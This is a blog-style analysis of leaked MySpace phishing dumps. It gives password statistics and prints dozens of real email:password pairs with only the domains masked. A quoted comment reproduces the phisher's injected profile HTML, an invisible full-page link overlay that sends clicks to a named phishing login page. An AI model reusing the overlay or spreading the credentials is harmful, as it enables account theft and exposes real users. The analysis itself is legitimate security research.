Contents
Abstract
Today I found a interesting article on Myspace phishing site discloses countless usernames and passwords on SecuriTeam. Some one must have found the user/password combo file collected by a Phisher. It is a collection of ~57’000 User/pass (actually email/pass) combos. Some of them will be fake but anyway, I’ve got interested in the whole story. After some research I found the original advisory on FullDisclosure (which by the way also includes the passdump). I also Googled a bit around and found 3 more files with the name “myspace.txt”. This short analysis is based on these 4 passdumps. I really like to play with real data 🙂
The files
| File | Size | Lines | Unique lines | Comment |
| m0 | 1886347 | 56590 | 42575 | Original file from the advisory |
| m1 | 1405905 | 45325 | 43098 | found with google |
| m2 | 1527730 | 48892 | 46664 | found with google |
| m3 | 1527769 | 48900 | 46664 | found with google |
People and fishing
Some people realized that they are going to be phished 🙂
fuck.off.seriousy:computergek you really really suck:fuckoffthisissomethingadickwoulddo youguyssuck@fuckoff.com:getalifeubastard fuckyou@fuckoff.com:diephisher lollol
Other peoples don’t. They actually try to login many times (the number before the combo is the number of logins they tried):
[system@nord myspace]# sort * | uniq -c | sort -n | tail -n 30
18 amandamyspace_email@xxxx.com:josh2202
18 blndygrl82@xxxxxx.com:luvyachris
18 dncrj629@xxxxxxxx.net:julie
18 dtonesuperstarr@xxxxxxxx.com:carla09
18 eathenallen@xxx.com:candisma3
18 haleytrash@xxxxxx.com:buttcrack.
18 iamtyler44@xxxxxx.com:tjh123
18 katyandjan@xxxxxxx.net:meeow1
18 latinagirlveronica@xxxxx.com:teddy123
18 molly_doglover@xx.com:1007404mkk
20 alicewang93@xxxxxxxxxx.com:puppies11
21 b_radschenk@xxxxx.com:ford08
21 gogirl55546@xxxxxx.com:emmakauf!
21 helenichero617@xxx.com:christian
21 larissapasifull@xxxxxxx.com:16188s
21 soccergirlbay94@xxxxxxxx.com:1020064evaandalways
21 yellowducks4you@xxx.net:norton13
22 zjs1daddy@xxxxx.com:freeshit4me
23 jbacaphoto@xxxxxxxxx.net:tiger2
23 twisted_and_frayed@xxxxxx.com:danny12031986
24 cathysurmick@xxxx.com:travis13
24 rlsorey@xx.com:abc123
24 the_beast525@xxxx.com:zander1
24 typ.1985@xxxxxxx.com:Mikhail
27 amandapandapixie@xx.com:panda1
36 aaron.braesicke@xxxxxx.net:dragon1
40 prissykatie2@xxxxx.com:swimmer1
45 southpark1@xxxxxxx.com:ajizzle!
262
437Â :
[system@nord myspace]#
Password quality
The 30 most used passwords
from the original list m0:
1 | [system@nord myspace]# sort m0 | uniq | awk -F: '{ print $2}' | sort | uniq -c | sort -n | tail -n 30 |
13 love123
13 michael1
13 password2
14 asshole
14 bitch
14 fuck you
14 iloveyou
14 jordan1
14 qwerty1
15 123456a
15 babygirl1
15 blink182
15 bubbles1
15 princess1
16 123abc
16 iloveyou2
17 123456
17 nicole1
18 football1
18 number1
21 password
22 i
24 fuckyou1
24 myspace1
28 iloveyou1
29 monkey1
34 fuckyou
56 abc123
75 password1
981
[system@nord myspace]#
Password length
Password length
Password length chart
BUT: if we lock at the 20 character passwords you will see, that these aren’t actually passwords:
duanne1105duanne1105 youreastupidjerkface ieatshitforbreakfest 1andrewlennon@yahcgg fishyp@sbcglobal.net suck my dick, pricks fuckinhackersgo2hell nice try you asshole ILLHACKYOURMOMSPUSSY suckmycockits9inches worthlesspieceofshit m loged in you bitch URADUMBFUKKHAKKERHAH Coopsieee3Coopsieee3 u suck i aint stupid heymrhackerurafaggot fuck you hack wanker jfduoa932p[1rguinfkl kaykay1211loserific1 stfu and get a life. this is fake dipshit fuck you and yo mama mind ya own business youmustthinkimstupid
How the Phisher did it
- from Waldo
Hmm… Oh no is very easy, yes very easy what he is doing. He left some traces on some of the “cracked” accounts, I was expectig of somebody to comment earlier since I’ve been a couple of hours since the initial post.
When you modify a profile you can add this to the data of the profile, you know those HTML customizations. I found this on one of the accounts that really got my attention a little bit more than the girl of the account 😛
1 | HOLA!!!!<a style="text-decoration:none;position: absolute;top:1px;left:1px;" href="<a title="http://marcolano.com/login/" href="http://marcolano.com/login/" rel="nofollow">http://marcolano.com/login/</a>"> <img style="border-width:0px;width:2024px; height:1768px;" src="<img src="http://x.myspace.com/images/clear.gif" alt="clear.gif" />"> </a><a style="text-decoration:none;position: absolute;top:1px;left:1px;" href="<a title="http://marcolano.com/login/" href="http://marcolano.com/login/" rel="nofollow">http://marcolano.com/login/</a>"> <img style="border-width:0px;width:2024px; height:1768px;" src="<img src="http://x.myspace.com/images/clear.gif" alt="clear.gif" />"> </a><embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="<a title="http://www.../mov/cid_3277_f.mov" href="http://www.../mov/cid_3277_f.mov" rel="nofollow">http://www.../mov/cid_3277_f.mov</a>" width="1" height="1"> |
As you might see, this creates a huge invisible link in the page in front of everything, so when you click into anything on the page like a link or anything it will take you to that phising website so ppl beleive that the account expired and enter their user+pass. Now I beleive that his message was a way to tell about a BUG in myspace that should filter that content and it is not doing it. So… we are in fact not talking about a stupid phishing website for those who still beleive that.
Regards Waldo
- and KF enhance:
nameHREFTrack